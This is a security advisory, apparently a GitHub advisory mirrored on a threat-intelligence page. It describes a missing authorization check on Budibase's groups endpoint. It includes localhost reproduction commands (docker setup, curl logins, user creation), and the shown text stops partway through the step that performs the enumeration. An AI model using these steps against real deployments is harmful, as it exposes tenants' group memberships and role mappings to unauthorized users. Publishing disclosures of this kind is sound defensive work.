GHSA-4qcj-m5wp-jmf4
## Summary The `GET /api/global/groups` endpoint on the worker service has no role-based authorization middleware. Any authenticated user (including BASIC role) can enumerate all user groups in the tenant, including their role mappings, user memberships, builder permissions, and the isDefault flag. ## Steps to Reproduce ### 1. Start Budibase ```bash docker run -d --name budibase-poc -p 10000:80 \ -e MINIO_ACCESS_KEY=minio_access -e MINIO_SECRET_KEY=minio_secret \ -e INTERNAL_API_KEY=internal_api_key -e JWT_SECRET=jwt_secret_test \ -e API_ENCRYPTION_KEY=api_enc_key_test123456 \ -e [email protected] \ -e BB_ADMIN_USER_PASSWORD=TestPassword123! \ budibase/budibase:latest until curl -sf http://localhost:10000/health; do sleep 5; done ``` ### 2. Login as admin, create a user group, create a BASIC user ```bash # Login as admin curl -s -c /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json" \ -d '{"username":"[email protected]","password":"TestPassword123!"}' # Create a user group (requires license with user groups feature, or use Budibase Cloud) # On self-hosted without license, groups may not be available # If available: curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/groups \ -H "Content-Type: application/json" \ -d '{"name":"Secret Admin Group","color":"#ff0000","icon":"AdminPanelSettingsIcon","roles":{"app_abc123":"ADMIN"}}' # Create a BASIC user (no builder, no admin) curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/users \ -H "Content-Type: application/json" \ -d '{"email":"[email protected]","password":"BasicPass123!","roles":{},"admin":{"global":false},"builder":{"global":false}}' ``` ### 3. Login as BASIC user and enumerate all groups (the vulnerability) ```bash # Login as BASIC user curl -s -c /tmp/bb_basic.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json"
Properties
- ghsa_id
- GHSA-4qcj-m5wp-jmf4
- severity
- medium
- summary
- Budibase: Missing RBAC on GET /api/global/groups allows BASIC users to enumerate all tenant groups and role mappings
- cvss_score
- 4.3
- cve_id
- GHSA-4qcj-m5wp-jmf4
- cvss_vector
- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
- is_ghsa_only
- true
- ghsa_published
- 2026-07-24T21:13:07Z
- source_url
- https://github.com/advisories/GHSA-4qcj-m5wp-jmf4
- ghsa_updated
- 2026-07-24T21:13:08Z
Related Entities (4)
REPORTED_BY (1)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
Explore deeper with Ninja Signal's threat intelligence graph